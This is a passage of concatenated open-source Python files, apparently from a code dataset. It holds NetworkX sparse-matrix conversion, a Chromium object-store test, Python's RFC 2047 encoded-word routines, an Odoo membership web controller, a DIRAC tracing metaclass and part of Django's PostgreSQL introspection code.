If `nodelist` is None, then the ordering is produced by G.nodes().
dtype : NumPy data-type, optional
A valid NumPy named dtype used to initialize the NumPy recarray.
The data type names are assumed to be keys in the graph edge attribute
dictionary.
order : {'C', 'F'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. If None, then the NumPy default
is used.
Returns
-------
M : NumPy recarray
The graph with specified edge data as a Numpy recarray
Notes
-----
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
Examples
--------
>>> G = nx.Graph()
>>> G.add_edge(1,2,weight=7.0,cost=5)
>>> A=nx.to_numpy_recarray(G,dtype=[('weight',float),('cost',int)])
>>> print(A.weight)
[[ 0. 7.]
[ 7. 0.]]
>>> print(A.cost)
[[0 5]
[5 0]]
"""
import numpy as np
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
if len(nodelist) != len(nodeset):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
nlen=len(nodelist)
undirected = not G.is_directed()
index=dict(zip(nodelist,range(nlen)))
M = np.zeros((nlen,nlen), dtype=dtype, order=order)
names=M.dtype.names
for u,v,attrs in G.edges_iter(data=True):
if (u in nodeset) and (v in nodeset):
i,j = index[u],index[v]
values=tuple([attrs[n] for n in names])
M[i,j] = values
if undirected:
M[j,i] = M[i,j]
return M.view(np.recarray)
def to_scipy_sparse_matrix(G, nodelist=None, dtype=None,
weight='weight', format='csr'):
"""Return the graph adjacency matrix as a SciPy sparse matrix.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
If `nodelist` is None, then the ordering is produced by G.nodes().
dtype : NumPy data-type, optional
A valid NumPy dtype used to initialize the array. If None, then the
NumPy default is used.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None then all edge weights are 1.
format : str in {'bsr', 'csr', 'csc', 'coo', 'lil', 'dia', 'dok'}
The type of the matrix to be returned (default 'csr'). For
some algorithms different implementations of sparse matrices
can perform better. See [1]_ for details.
Returns
-------
M : SciPy sparse matrix
Graph adjacency matrix.
Notes
-----
The matrix entries are populated using the edge attribute held in
parameter weight. When an edge does not have that attribute, the
value of the entry is 1.
For multiple edges the matrix values are the sums of the edge weights.
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
Uses coo_matrix format. To convert to other formats specify the
format= keyword.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Scipy sparse matrix can be modified as follows:
>>> import scipy as sp
>>> G = nx.Graph([(1,1)])
>>> A = nx.to_scipy_sparse_matrix(G)
>>> print(A.todense())
[[1]]
>>> A.setdiag(A.diagonal()*2)
>>> print(A.todense())
[[2]]
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> S = nx.to_scipy_sparse_matrix(G, nodelist=[0,1,2])
>>> print(S.todense())
[[0 2 0]
[1 0 0]
[0 0 4]]
References
----------
.. [1] Scipy Dev. References, "Sparse Matrices",
http://docs.scipy.org/doc/scipy/reference/sparse.html
"""
from scipy import sparse
if nodelist is None:
nodelist = G
nlen = len(nodelist)
if nlen == 0:
raise nx.NetworkXError("Graph has no nodes or edges")
if len(nodelist) != len(set(nodelist)):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
index = dict(zip(nodelist,range(nlen)))
if G.number_of_edges() == 0:
row,col,data=[],[],[]
else:
row,col,data = zip(*((index[u],index[v],d.get(weight,1))
for u,v,d in G.edges_iter(nodelist, data=True)
if u in index and v in index))
if G.is_directed():
M = sparse.coo_matrix((data,(row,col)),
shape=(nlen,nlen), dtype=dtype)
else:
# symmetrize matrix
d = data + data
r = row + col
c = col + row
# selfloop entries get double counted when symmetrizing
# so we subtract the data on the diagonal
selfloops = G.selfloop_edges(data=True)
if selfloops:
diag_index,diag_data = zip(*((index[u],-d.get(weight,1))
for u,v,d in selfloops
if u in index and v in index))
d += diag_data
r += diag_index
c += diag_index
M = sparse.coo_matrix((d, (r, c)), shape=(nlen,nlen), dtype=dtype)
try:
return M.asformat(format)
except AttributeError:
raise nx.NetworkXError("Unknown sparse matrix format: %s"%format)
def _csr_gen_triples(A):
"""Converts a SciPy sparse matrix in **Compressed Sparse Row** format to
an iterable of weighted edge triples.
"""
nrows = A.shape[0]
data, indices, indptr = A.data, A.indices, A.indptr
for i in range(nrows):
for j in range(indptr[i], indptr[i+1]):
yield i, indices[j], data[j]
def _csc_gen_triples(A):
"""Converts a SciPy sparse matrix in **Compressed Sparse Column** format to
an iterable of weighted edge triples.
"""
ncols = A.shape[1]
data, indices, indptr = A.data, A.indices, A.indptr
for i in range(ncols):
for j in range(indptr[i], indptr[i+1]):
yield indices[j], i, data[j]
def _coo_gen_triples(A):
"""Converts a SciPy sparse matrix in **Coordinate** format to an iterable
of weighted edge triples.
"""
row, col, data = A.row, A.col, A.data
return zip(row, col, data)
def _dok_gen_triples(A):
"""Converts a SciPy sparse matrix in **Dictionary of Keys** format to an
iterable of weighted edge triples.
"""
for (r, c), v in A.items():
yield r, c, v
def _generate_weighted_edges(A):
"""Returns an iterable over (u, v, w) triples, where u and v are adjacent
vertices and w is the weight of the edge joining u and v.
`A` is a SciPy sparse matrix (in any format).
"""
if A.format == 'csr':
return _csr_gen_triples(A)
if A.format == 'csc':
return _csc_gen_triples(A)
if A.format == 'dok':
return _dok_gen_triples(A)
# If A is in any other format (including COO), convert it to COO format.
return _coo_gen_triples(A.tocoo())
def from_scipy_sparse_matrix(A, parallel_edges=False, create_using=None,
edge_attribute='weight'):
"""Creates a new graph from an adjacency matrix given as a SciPy sparse
matrix.
Parameters
----------
A: scipy sparse matrix
An adjacency matrix representation of a graph
parallel_edges : Boolean
If this is ``True``, `create_using` is a multigraph, and `A` is an
integer matrix, then entry *(i, j)* in the matrix is interpreted as the
number of parallel edges joining vertices *i* and *j* in the graph. If it
is ``False``, then the entries in the adjacency matrix are interpreted as
the weight of a single edge joining the vertices.
create_using: NetworkX graph
Use specified graph for result. The default is Graph()
edge_attribute: string
Name of edge attribute to store matrix numeric value. The data will
have the same type as the matrix entry (int, float, (real,imag)).
Notes
-----
If `create_using` is an instance of :class:`networkx.MultiGraph` or
:class:`networkx.MultiDiGraph`, `parallel_edges` is ``True``, and the
entries of `A` are of type ``int``, then this function returns a multigraph
(of the same type as `create_using`) with parallel edges. In this case,
`edge_attribute` will be ignored.
If `create_using` is an undirected multigraph, then only the edges
indicated by the upper triangle of the matrix `A` will be added to the
graph.
Examples
--------
>>> import scipy.sparse
>>> A = scipy.sparse.eye(2,2,1)
>>> G = nx.from_scipy_sparse_matrix(A)
If `create_using` is a multigraph and the matrix has only integer entries,
the entries will be interpreted as weighted edges joining the vertices
(without creating parallel edges):
>>> import scipy
>>> A = scipy.sparse.csr_matrix([[1, 1], [1, 2]])
>>> G = nx.from_scipy_sparse_matrix(A, create_using=nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 2}}
If `create_using` is a multigraph and the matrix has only integer entries
but `parallel_edges` is ``True``, then the entries will be interpreted as
the number of parallel edges joining those two vertices:
>>> import scipy
>>> A = scipy.sparse.csr_matrix([[1, 1], [1, 2]])
>>> G = nx.from_scipy_sparse_matrix(A, parallel_edges=True,
... create_using=nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 1}, 1: {'weight': 1}}
"""
G = _prep_create_using(create_using)
n,m = A.shape
if n != m:
raise nx.NetworkXError(\
"Adjacency matrix is not square. nx,ny=%s"%(A.shape,))
# Make sure we get even the isolated nodes of the graph.
G.add_nodes_from(range(n))
# Create an iterable over (u, v, w) triples and for each triple, add an
# edge from u to v with weight w.
triples = _generate_weighted_edges(A)
# If the entries in the adjacency matrix are integers, the graph is a
# multigraph, and parallel_edges is True, then create parallel edges, each
# with weight 1, for each entry in the adjacency matrix. Otherwise, create
# one edge for each positive entry in the adjacency matrix and set the
# weight of that edge to be the entry in the matrix.
if A.dtype.kind in ('i', 'u') and G.is_multigraph() and parallel_edges:
chain = itertools.chain.from_iterable
# The following line is equivalent to:
#
# for (u, v) in edges:
# for d in range(A[u, v]):
# G.add_edge(u, v, weight=1)
#
triples = chain(((u, v, 1) for d in range(w)) for (u, v, w) in triples)
# If we are creating an undirected multigraph, only add the edges from the
# upper triangle of the matrix. Otherwise, add all the edges. This relies
# on the fact that the vertices created in the
# ``_generated_weighted_edges()`` function are actually the row/column
# indices for the matrix ``A``.
#
# Without this check, we run into a problem where each edge is added twice
# when `G.add_weighted_edges_from()` is invoked below.
if G.is_multigraph() and not G.is_directed():
triples = ((u, v, d) for u, v, d in triples if u <= v)
G.add_weighted_edges_from(triples, weight=edge_attribute)
return G
# fixture for nose tests
def setup_module(module):
from nose import SkipTest
try:
import numpy
except:
raise SkipTest("NumPy not available")
try:
import scipy
except:
raise SkipTest("SciPy not available")
try:
import pandas
except:
raise SkipTest("Pandas not available")
| gpl-3.0 |
Nu3001/external_chromium_org | chrome/common/extensions/docs/server2/test_object_store_test.py | 153 | 1495 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from test_object_store import TestObjectStore
import unittest
class TestObjectStoreTest(unittest.TestCase):
def testEmpty(self):
store = TestObjectStore('namespace')
self.assertEqual(None, store.Get('hi').Get())
self.assertEqual({}, store.GetMulti(['hi', 'lo']).Get())
def testNonEmpty(self):
store = TestObjectStore('namespace')
store.Set('hi', 'bye')
self.assertEqual('bye', store.Get('hi').Get())
self.assertEqual({'hi': 'bye'}, store.GetMulti(['hi', 'lo']).Get())
store.Set('hi', 'blah')
self.assertEqual('blah', store.Get('hi').Get())
self.assertEqual({'hi': 'blah'}, store.GetMulti(['hi', 'lo']).Get())
store.Del('hi')
self.assertEqual(None, store.Get('hi').Get())
self.assertEqual({}, store.GetMulti(['hi', 'lo']).Get())
def testCheckAndReset(self):
store = TestObjectStore('namespace')
store.Set('x', 'y')
self.assertTrue(*store.CheckAndReset(set_count=1))
store.Set('x', 'y')
store.Set('x', 'y')
self.assertTrue(*store.CheckAndReset(set_count=2))
store.Set('x', 'y')
store.Set('x', 'y')
store.Get('x').Get()
store.Get('x').Get()
store.Get('x').Get()
store.Del('x')
self.assertTrue(*store.CheckAndReset(get_count=3, set_count=2, del_count=1))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
firerszd/kbengine | kbe/src/lib/python/Lib/email/_encoded_words.py | 85 | 7913 | """ Routines for manipulating RFC2047 encoded words.
This is currently a package-private API, but will be considered for promotion
to a public API if there is demand.
"""
# An ecoded word looks like this:
#
# =?charset[*lang]?cte?encoded_string?=
#
# for more information about charset see the charset module. Here it is one
# of the preferred MIME charset names (hopefully; you never know when parsing).
# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In
# theory other letters could be used for other encodings, but in practice this
# (almost?) never happens. There could be a public API for adding entries
# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is
# Base64. The meaning of encoded_string should be obvious. 'lang' is optional
# as indicated by the brackets (they are not part of the syntax) but is almost
# never encountered in practice.
#
# The general interface for a CTE decoder is that it takes the encoded_string
# as its argument, and returns a tuple (cte_decoded_string, defects). The
# cte_decoded_string is the original binary that was encoded using the
# specified cte. 'defects' is a list of MessageDefect instances indicating any
# problems encountered during conversion. 'charset' and 'lang' are the
# corresponding strings extracted from the EW, case preserved.
#
# The general interface for a CTE encoder is that it takes a binary sequence
# as input and returns the cte_encoded_string, which is an ascii-only string.
#
# Each decoder must also supply a length function that takes the binary
# sequence as its argument and returns the length of the resulting encoded
# string.
#
# The main API functions for the module are decode, which calls the decoder
# referenced by the cte specifier, and encode, which adds the appropriate
# RFC 2047 "chrome" to the encoded string, and can optionally automatically
# select the shortest possible encoding. See their docstrings below for
# details.
import re
import base64
import binascii
import functools
from string import ascii_letters, digits
from email import errors
__all__ = ['decode_q',
'encode_q',
'decode_b',
'encode_b',
'len_q',
'len_b',
'decode',
'encode',
]
#
# Quoted Printable
#
# regex based decoder.
_q_byte_subber = functools.partial(re.compile(br'=([a-fA-F0-9]{2})').sub,
lambda m: bytes([int(m.group(1), 16)]))
def decode_q(encoded):
encoded = encoded.replace(b'_', b' ')
return _q_byte_subber(encoded), []
# dict mapping bytes to their encoded form
class _QByteMap(dict):
safe = b'-!*+/' + ascii_letters.encode('ascii') + digits.encode('ascii')
def __missing__(self, key):
if key in self.safe:
self[key] = chr(key)
else:
self[key] = "={:02X}".format(key)
return self[key]
_q_byte_map = _QByteMap()
# In headers spaces are mapped to '_'.
_q_byte_map[ord(' ')] = '_'
def encode_q(bstring):
return ''.join(_q_byte_map[x] for x in bstring)
def len_q(bstring):
return sum(len(_q_byte_map[x]) for x in bstring)
#
# Base64
#
def decode_b(encoded):
defects = []
pad_err = len(encoded) % 4
if pad_err:
defects.append(errors.InvalidBase64PaddingDefect())
padded_encoded = encoded + b'==='[:4-pad_err]
else:
padded_encoded = encoded
try:
return base64.b64decode(padded_encoded, validate=True), defects
except binascii.Error:
# Since we had correct padding, this must an invalid char error.
defects = [errors.InvalidBase64CharactersDefect()]
# The non-alphabet characters are ignored as far as padding
# goes, but we don't know how many there are. So we'll just
# try various padding lengths until something works.
for i in 0, 1, 2, 3:
try:
return base64.b64decode(encoded+b'='*i, validate=False), defects
except binascii.Error:
if i==0:
defects.append(errors.InvalidBase64PaddingDefect())
else:
# This should never happen.
raise AssertionError("unexpected binascii.Error")
def encode_b(bstring):
return base64.b64encode(bstring).decode('ascii')
def len_b(bstring):
groups_of_3, leftover = divmod(len(bstring), 3)
# 4 bytes out for each 3 bytes (or nonzero fraction thereof) in.
return groups_of_3 * 4 + (4 if leftover else 0)
_cte_decoders = {
'q': decode_q,
'b': decode_b,
}
def decode(ew):
"""Decode encoded word and return (string, charset, lang, defects) tuple.
An RFC 2047/2243 encoded word has the form:
=?charset*lang?cte?encoded_string?=
where '*lang' may be omitted but the other parts may not be.
This function expects exactly such a string (that is, it does not check the
syntax and may raise errors if the string is not well formed), and returns
the encoded_string decoded first from its Content Transfer Encoding and
then from the resulting bytes into unicode using the specified charset. If
the cte-decoded string does not successfully decode using the specified
character set, a defect is added to the defects list and the unknown octets
are replaced by the unicode 'unknown' character \uFDFF.
The specified charset and language are returned. The default for language,
which is rarely if ever encountered, is the empty string.
"""
_, charset, cte, cte_string, _ = ew.split('?')
charset, _, lang = charset.partition('*')
cte = cte.lower()
# Recover the original bytes and do CTE decoding.
bstring = cte_string.encode('ascii', 'surrogateescape')
bstring, defects = _cte_decoders[cte](bstring)
# Turn the CTE decoded bytes into unicode.
try:
string = bstring.decode(charset)
except UnicodeError:
defects.append(errors.UndecodableBytesDefect("Encoded word "
"contains bytes not decodable using {} charset".format(charset)))
string = bstring.decode(charset, 'surrogateescape')
except LookupError:
string = bstring.decode('ascii', 'surrogateescape')
if charset.lower() != 'unknown-8bit':
defects.append(errors.CharsetError("Unknown charset {} "
"in encoded word; decoded as unknown bytes".format(charset)))
return string, charset, lang, defects
_cte_encoders = {
'q': encode_q,
'b': encode_b,
}
_cte_encode_length = {
'q': len_q,
'b': len_b,
}
def encode(string, charset='utf-8', encoding=None, lang=''):
"""Encode string using the CTE encoding that produces the shorter result.
Produces an RFC 2047/2243 encoded word of the form:
=?charset*lang?cte?encoded_string?=
where '*lang' is omitted unless the 'lang' parameter is given a value.
Optional argument charset (defaults to utf-8) specifies the charset to use
to encode the string to binary before CTE encoding it. Optional argument
'encoding' is the cte specifier for the encoding that should be used ('q'
or 'b'); if it is None (the default) the encoding which produces the
shortest encoded sequence is used, except that 'q' is preferred if it is up
to five characters longer. Optional argument 'lang' (default '') gives the
RFC 2243 language string to specify in the encoded word.
"""
if charset == 'unknown-8bit':
bstring = string.encode('ascii', 'surrogateescape')
else:
bstring = string.encode(charset)
if encoding is None:
qlen = _cte_encode_length['q'](bstring)
blen = _cte_encode_length['b'](bstring)
# Bias toward q. 5 is arbitrary.
encoding = 'q' if qlen - blen < 5 else 'b'
encoded = _cte_encoders[encoding](bstring)
if lang:
lang = '*' + lang
return "=?{}{}?{}?{}?=".format(charset, lang, encoding, encoded)
| lgpl-3.0 |
acshan/odoo | addons/website_membership/controllers/main.py | 18 | 9437 | # -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID
from openerp.addons.web import http
from openerp.addons.web.http import request
from openerp.addons.website.models.website import unslug
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT
from openerp.tools.translate import _
import time
import werkzeug.urls
class WebsiteMembership(http.Controller):
_references_per_page = 20
@http.route([
'/members',
'/members/page/<int:page>',
'/members/association/<membership_id>',
'/members/association/<membership_id>/page/<int:page>',
'/members/country/<int:country_id>',
'/members/country/<country_name>-<int:country_id>',
'/members/country/<int:country_id>/page/<int:page>',
'/members/country/<country_name>-<int:country_id>/page/<int:page>',
'/members/association/<membership_id>/country/<country_name>-<int:country_id>',
'/members/association/<membership_id>/country/<int:country_id>',
'/members/association/<membership_id>/country/<country_name>-<int:country_id>/page/<int:page>',
'/members/association/<membership_id>/country/<int:country_id>/page/<int:page>',
], type='http', auth="public", website=True)
def members(self, membership_id=None, country_name=None, country_id=0, page=1, **post):
cr, uid, context = request.cr, request.uid, request.context
product_obj = request.registry['product.product']
country_obj = request.registry['res.country']
membership_line_obj = request.registry['membership.membership_line']
partner_obj = request.registry['res.partner']
post_name = post.get('name', '')
current_country = None
# base domain for groupby / searches
base_line_domain = [("partner.website_published", "=", True), ('state', 'in', ['free', 'paid'])]
if membership_id and membership_id != 'free':
membership_id = int(membership_id)
today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
base_line_domain += [
('membership_id', '=', membership_id), ('date_to', '>=', today),
('date_from', '<=', today), ('state', '=', 'paid')
]
membership = product_obj.browse(cr, uid, membership_id, context=context)
else:
membership = None
if post_name:
base_line_domain += ['|', ('partner.name', 'ilike', post_name),
('partner.website_description', 'ilike', post_name)]
# group by country, based on all customers (base domain)
if membership_id != 'free':
membership_line_ids = membership_line_obj.search(cr, SUPERUSER_ID, base_line_domain, context=context)
country_domain = [('member_lines', 'in', membership_line_ids)]
else:
membership_line_ids = []
country_domain = [('membership_state', '=', 'free')]
if post_name:
country_domain += ['|', ('name', 'ilike', post_name),
('website_description', 'ilike', post_name)]
countries = partner_obj.read_group(
cr, SUPERUSER_ID, country_domain + [("website_published", "=", True)], ["id", "country_id"],
groupby="country_id", orderby="country_id", context=request.context)
countries_total = sum(country_dict['country_id_count'] for country_dict in countries)
line_domain = list(base_line_domain)
if country_id:
line_domain.append(('partner.country_id', '=', country_id))
current_country = country_obj.read(cr, uid, country_id, ['id', 'name'], context)
if not any(x['country_id'][0] == country_id for x in countries if x['country_id']):
countries.append({
'country_id_count': 0,
'country_id': (country_id, current_country["name"])
})
countries = filter(lambda d:d['country_id'], countries)
countries.sort(key=lambda d: d['country_id'][1])
countries.insert(0, {
'country_id_count': countries_total,
'country_id': (0, _("All Countries"))
})
# format domain for group_by and memberships
membership_ids = product_obj.search(cr, uid, [('membership', '=', True)], order="website_sequence", context=context)
memberships = product_obj.browse(cr, uid, membership_ids, context=context)
# make sure we don't access to lines with unpublished membershipts
line_domain.append(('membership_id', 'in', membership_ids))
limit = self._references_per_page
offset = limit * (page - 1)
count_members = 0
membership_line_ids = []
# displayed non-free membership lines
if membership_id != 'free':
count_members = membership_line_obj.search_count(cr, SUPERUSER_ID, line_domain, context=context)
if offset <= count_members:
membership_line_ids = tuple(membership_line_obj.search(cr, SUPERUSER_ID, line_domain, offset, limit, context=context))
membership_lines = membership_line_obj.browse(cr, uid, membership_line_ids, context=context)
# TODO: Following line can be deleted in master. Kept for retrocompatibility.
membership_lines = sorted(membership_lines, key=lambda x: x.membership_id.website_sequence)
page_partner_ids = set(m.partner.id for m in membership_lines)
google_map_partner_ids = []
if request.env.ref('website_membership.opt_index_google_map').customize_show:
membership_lines_ids = membership_line_obj.search(cr, uid, line_domain, context=context)
google_map_partner_ids = membership_line_obj.get_published_companies(cr, uid, membership_line_ids, limit=2000, context=context)
search_domain = [('membership_state', '=', 'free'), ('website_published', '=', True)]
if post_name:
search_domain += ['|', ('name', 'ilike', post_name), ('website_description', 'ilike', post_name)]
if country_id:
search_domain += [('country_id', '=', country_id)]
free_partner_ids = partner_obj.search(cr, SUPERUSER_ID, search_domain, context=context)
memberships_data = []
for membership_record in memberships:
memberships_data.append({'id': membership_record.id, 'name': membership_record.name})
memberships_partner_ids = {}
for line in membership_lines:
memberships_partner_ids.setdefault(line.membership_id.id, []).append(line.partner.id)
if free_partner_ids:
memberships_data.append({'id': 'free', 'name': _('Free Members')})
if not membership_id or membership_id == 'free':
if count_members < offset + limit:
free_start = max(offset - count_members, 0)
free_end = max(offset + limit - count_members, 0)
memberships_partner_ids['free'] = free_partner_ids[free_start:free_end]
page_partner_ids |= set(memberships_partner_ids['free'])
google_map_partner_ids += free_partner_ids[:2000-len(google_map_partner_ids)]
count_members += len(free_partner_ids)
google_map_partner_ids = ",".join(map(str, google_map_partner_ids))
partners = { p.id: p for p in partner_obj.browse(request.cr, SUPERUSER_ID, list(page_partner_ids), request.context)}
base_url = '/members%s%s' % ('/association/%s' % membership_id if membership_id else '',
'/country/%s' % country_id if country_id else '')
# request pager for lines
pager = request.website.pager(url=base_url, total=count_members, page=page, step=limit, scope=7, url_args=post)
values = {
'partners': partners,
'membership_lines': membership_lines, # TODO: This line can be deleted in master. Kept for retrocompatibility.
'memberships': memberships, # TODO: This line too.
'membership': membership, # TODO: This line too.
'memberships_data': memberships_data,
'memberships_partner_ids': memberships_partner_ids,
'membership_id': membership_id,
'countries': countries,
'current_country': current_country and [current_country['id'], current_country['name']] or None,
'current_country_id': current_country and current_country['id'] or 0,
'google_map_partner_ids': google_map_partner_ids,
'pager': pager,
'post': post,
'search': "?%s" % werkzeug.url_encode(post),
}
return request.website.render("website_membership.index", values)
# Do not use semantic controller due to SUPERUSER_ID
@http.route(['/members/<partner_id>'], type='http', auth="public", website=True)
def partners_detail(self, partner_id, **post):
_, partner_id = unslug(partner_id)
if partner_id:
partner = request.registry['res.partner'].browse(request.cr, SUPERUSER_ID, partner_id, context=request.context)
if partner.exists() and partner.website_published:
values = {}
values['main_object'] = values['partner'] = partner
return request.website.render("website_membership.partner", values)
return self.members(**post)
| agpl-3.0 |
fibbo/DIRAC | Core/Utilities/Traced.py | 17 | 3165 | ########################################################################
# $HeadURL $
# File: Traced.py
# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2012/08/08 13:29:18
########################################################################
"""
:mod: Traced
.. module: Traced
:synopsis: watched mutable metaclass
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
watched mutable metaclass tracing all updated indexes or keys
"""
__RCSID__ = "$Id: $"
##
# @file Traced.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2012/08/08 13:29:27
# @brief Definition of Traced metaclass.
########################################################################
class Traced( type ):
"""
.. class:: Traced
metaclass telling if some attrs was updated
overwrites __setattr__ and __setitem__
adds updated member function and __updated__ attribute
"""
def __new__( cls, cls_name, bases, classdict ):
""" prepare new class instance """
def updated( self, element=None, reset=False ):
""" updates and returns __updated__ list
:param self: self reference
:param mixed element: key name or list index
:param bool reset: flag to zero __updated__ list
:return: __updated__ list when called without arguments
"""
if not self.__update__ or reset:
self.__update__ = list()
if element != None and element not in self.__update__:
self.__update__.append( element )
return self.__update__
def trace_setattr( self, name, value ):
""" __setattr__ tracing value update """
#if not name.startswith("_") and name not in dir(self):
# raise AttributeError("'%s' has no attribute '%s'" % ( self.__class__.__name__, name ) )
if name != "__update__":
if not hasattr( self, name ) or getattr( self, name ) != value:
self.updated( name )
bases[0].__setattr__( self, name, value )
def trace_update( self, seq ):
""" for dict only """
for key, value in seq.items():
if key not in self or bases[0].__getitem__( self, key ) != value:
self.updated( key )
bases[0].update( seq )
def trace_append( self, item ):
""" append for list """
self.updated( len(self) )
self += [ item ]
def trace_setitem( self, ind, item ):
""" __setitem__ tracing value update """
if bases[0] == dict and ( ind not in self or bases[0].__getitem__( self, ind ) != item ):
self.updated( ind )
elif bases[0] == list and bases[0].__getitem__( self, ind ) != item:
self.updated( ind )
bases[0].__setitem__( self, ind, item )
classdict["__setattr__"] = trace_setattr
classdict["__setitem__"] = trace_setitem
if bases[0] == dict:
classdict["update"] = trace_update
if bases[0] == list:
classdict["append"] = trace_append
classdict["updated"] = updated
classdict["__update__"] = None
return type.__new__( cls, cls_name, bases, classdict )
class TracedDict(dict):
""" traced dict """
__metaclass__ = Traced
class TracedList(list):
""" traced list """
__metaclass__ = Traced
| gpl-3.0 |
shermanng10/superathletebuilder | env/lib/python2.7/site-packages/django/db/backends/postgresql_psycopg2/introspection.py | 119 | 10042 | from __future__ import unicode_literals
from collections import namedtuple
from django.db.backends.base.introspection import (
BaseDatabaseIntrospection, FieldInfo, TableInfo,
)
from django.utils.encoding import force_text
FieldInfo = namedtuple('FieldInfo', FieldInfo._fields + ('default',))
class DatabaseIntrospection(BaseDatabaseIntrospection):
# Maps type codes to Django Field types.
data_types_reverse = {
16: 'BooleanField',
17: 'BinaryField',
20: 'BigIntegerField',
21: 'SmallIntegerField',
23: 'IntegerField',
25: 'TextField',
700: 'FloatField',
701: 'FloatField',
869: 'GenericIPAddressField',
1042: 'CharField', # blank-padded
1043: 'CharField',
1082: 'DateField',
1083: 'TimeField',
1114: 'DateTimeField',
1184: 'DateTimeField',
1266: 'TimeField',
1700: 'DecimalField',
}
ignored_tables = []
def get_field_type(self, data_type, description):
field_type = super(DatabaseIntrospection, self).get_field_type(data_type, description)
if field_type == 'IntegerField' and description.default and 'nextval' in description.default:
return 'AutoField'
return field_type
def get_table_list(self, cursor):
"""
Returns a list of table and view names in the current database.
"""
cursor.execute("""
SELECT c.relname, c.relkind
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r', 'v')
AND n.nspname NOT IN ('pg_catalog', 'pg_toast')
AND pg_catalog.pg_table_is_visible(c.oid)""")
return [TableInfo(row[0], {'r': 't', 'v': 'v'}.get(row[1]))
for row in cursor.fetchall()
if row[0] not in self.ignored_tables]
def get_table_description(self, cursor, table_name):
"Returns a description of the table, with the DB-API cursor.description interface."
# As cursor.description does not return reliably the nullable property,
# we have to query the information_schema (#7783)
cursor.execute("""
SELECT column_name, is_nullable, column_default
FROM information_schema.columns
WHERE table_name = %s""", [table_name])
field_map = {line[0]: line[1:] for line in cursor.fetchall()}
cursor.execute("SELECT * FROM %s LIMIT 1" % self.connection.ops.quote_name(table_name))
return [FieldInfo(*((force_text(line[0]),) + line[1:6]
+ (field_map[force_text(line[0])][0] == 'YES', field_map[force_text(line[0])][1])))
for line in cursor.description]
def get_relations(self, cursor, table_name):
"""
Returns a dictionary of {field_name: (field_name_other_table, other_table)}
representing all relationships to the given table.
"""
cursor.execute("""
SELECT c2.relname, a1.attname, a2.attname
FROM pg_constraint con
LEFT JOIN pg_class c1 ON con.conrelid = c1.oid
LEFT JOIN pg_class c2 ON con.confrelid = c2.oid
LEFT JOIN pg_attribute a1 ON c1.oid = a1.attrelid AND a1.attnum = con.conkey[1]
LEFT JOIN pg_attribute a2 ON c2.oid = a2.attrelid AND a2.attnum = con.confkey[1]
WHERE c1.relname = %s
AND con.contype = 'f'""", [table_name])
relations = {}
for row in cursor.fetchall():
relations[row[1]] = (row[2], row[0])
return relations
def get_key_columns(self, cursor, table_name):
key_columns = []
cursor.execute("""
SELECT kcu.column_name, ccu.table_name AS referenced_table, ccu.column_name AS referenced_column
FROM information_schema.constraint_column_usage ccu
LEFT JOIN information_schema.key_column_usage kcu
ON ccu.constraint_catalog = kcu.constraint_catalog
AND ccu.constraint_schema = kcu.constraint_schema
AND ccu.constraint_name = kcu.constraint_name
LEFT JOIN information_schema.table_constraints tc
ON ccu.constraint_catalog = tc.constraint_catalog
AND ccu.constraint_schema = tc.constraint_schema
AND ccu.constraint_name = tc.constraint_name
WHERE kcu.table_name = %s AND tc.constraint_type = 'FOREIGN KEY'""", [table_name])
key_columns.extend(cursor.fetchall())
return key_columns
def get_indexes(self, cursor, table_name):
# This query retrieves each index on the given table, including the
# first associated field name
cursor.execute("""
SELECT attr.attname, idx.indkey, idx.indisunique, idx.indisprimary
FROM pg_catalog.pg_class c, pg_catalog.pg_class c2,
pg_catalog.pg_index idx, pg_catalog.pg_attribute attr
WHERE c.oid = idx.indrelid
AND idx.indexrelid = c2.oid
AND attr.attrelid = c.oid
AND attr.attnum = idx.indkey[0]
AND c.relname = %s""", [table_name])
indexes = {}
for row in cursor.fetchall():
# row[1] (idx.indkey) is stored in the DB as an array. It comes out as
# a string of space-separated integers. This designates the field
# indexes (1-based) of the fields that have indexes on the table.
# Here, we skip any indexes across multiple fields.
if ' ' in row[1]:
continue
if row[0] not in indexes:
indexes[row[0]] = {'primary_key': False, 'unique': False}
# It's possible to have the unique and PK constraints in separate indexes.
if row[3]:
indexes[row[0]]['primary_key'] = True
if row[2]:
indexes[row[0]]['unique'] = True
return indexes
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index) across one or more columns.
"""
constraints = {}
# Loop over the key table, collecting things as constraints
# This will get PKs, FKs, and uniques, but not CHECK
cursor.execute("""
SELECT
kc.constraint_name,
kc.column_name,
c.constraint_type,
array(SELECT table_name::text || '.' || column_name::text
